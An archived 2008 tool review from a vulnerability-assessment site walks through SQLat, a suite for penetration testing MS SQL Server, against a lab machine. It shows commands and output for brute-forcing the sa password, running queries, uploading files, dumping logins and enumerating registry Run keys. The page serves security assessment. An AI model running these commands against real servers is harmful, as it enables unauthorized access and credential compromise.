 |
 |
 |
 |
 |
  |
|||
 |
 |
 |
|
|
SQL Auditing Tools, (SQLat)
SQLat is a nice suite of tools which come in handy when trying to carry out a vulnerability assessment/penetration test against a MS SQL Server.
SQLat encompasses the following tools:
Note: - The tool temporarily restores the xp_cmdshell if it is removed and the dll is still left on the system and you do require credentials for a number of the above to work correctly.
SQLAT is based on the freetds library and as of version 1.0.6 supports NTLM integrated login. It does not do named pipes yet.
Installation:
SQLat has a number of prior requisites:
FreeTDS needs to be installed first with the usual procedure for a tar.gz file: ./configure make make install
pwdump2 needs to be unzipped to an appropriate directory.
to install SQLat use the following commands:
./configure --with-tdsver=7.0
or at least with the above parameter.
make make install
It is available from here.
Execution and expected output:
[root@hacker bin]# ./sqldict SQLDict v1.1.0 by patrik@cqure.net ---------------------------------- usage: ./sqldict [options] -i* <ip|ipfile> to probe -t port (default 1433) -u* <userfile> -p* <dicfile> -r <reportfile> -v verbose
[root@hacker bin]# ./sqldict -i 192.168.1.175 -u user.txt -p password.txt IP: 192.168.1.175 User: sa Pass: password
Obviously got the easy password for sa as "password"
[root@hacker bin]# ./sqlquery SQLExec v1.1.0 by <patrik@cqure.net> ------------------------------------ ./sqlquery [options] -i* <ipaddress> -t port (default 1433) -q <query> (if ommited execute interactive mode) -u username -p password
[root@hacker bin]# ./sqlquery -i 192.168.1.175 -u sa -p password -q "select @@version" SQLExec v1.1.0 by <patrik@cqure.net> ------------------------------------------ Microsoft SQL Server 7.00 - 7.00.623 (Intel X86) Nov 27 1998 22:20:07 Copyright (c) 1988-1998 Microsoft Corporation Standard Edition on Windows NT 4.0 (Build 1381: Service Pack 6)
Passes an sql query to determine the version of the database, obviously with this example we are using the credentials we have broken out earlier.
[root@hacker bin]# ./sqlupload SQLUPLOAD v1.1.0 by patrik@cqure.net ------------------------------------ usage: ./sqlupload [options] -i* <ipaddress> to probe -t port (default 1433) -f* <filename> to upload -u username -p password -T path to tempdir if not autodetected -h this -v verbose
[root@hacker bin]# ./sqlupload -i 192.168.1.175 -u sa -p password -f user.txt -v SQLUpload by Patrik Karlsson <patrik@cqure.net> -- Logging in to 192.168.1.175 -- -- Searching for temp path -- Your file will be in c:\temp -- Uploading user.txt --
An attempt to upload a file with sa credentials succeeding.
[root@hacker bin]# ./sqldumplogins SQLDumpLogins v1.1.0 by <patrik@cqure.net> ------------------------------------------ ./sqldumplogins [options] -i* <ipaddress> -t port (default 1433) -u username -p password [root@hacker bin]# ./sqldumplogins -i 192.168.1.175 -u sa -p password SQLDumpLogins v1.1.0 by <patrik@cqure.net> ------------------------------------------ Administrator sa
Enumerating all users on the remote machines utilising the privileges gained previously.
[root@hacker bin]# ./sqlregenumkey ./sqlregenumkey: option requires an argument -- k SQLRegEnum v1.1.0 by <patrik@cqure.net> --------------------------------------- ./sqlregenumkey [options] -i* <ipaddress> -t port (default 1433) -k <key> (default HKLM\SW\MS\Win\CurrVer\Run) -u <username> -p <password>
[root@hacker bin]# ./sqlregenumkey -i 192.168.1.175 -u sa -p password -k SQLRegEnum v1.1.0 by <patrik@cqure.net> ------------------------------------------ SystemTray=SysTray.Exe BrowserWebCheck=loadwc.exe SchedulingAgent=mstinit.exe /logon VMware Tools=C:\Program Files\VMware\VMware Tools\VMwareTray.exe VMware User Process=C:\Program Files\VMware\VMware Tools\VMwareUser.exe
Enumerates what processes run at system boot, obviously in this case we are attacking a VM machine.
|
IT Security News:
Pen Testing Framework:
Latest Tool Reviews:
|
| © VulnerabilityAssessment.co.uk 24 February 2008 |
|
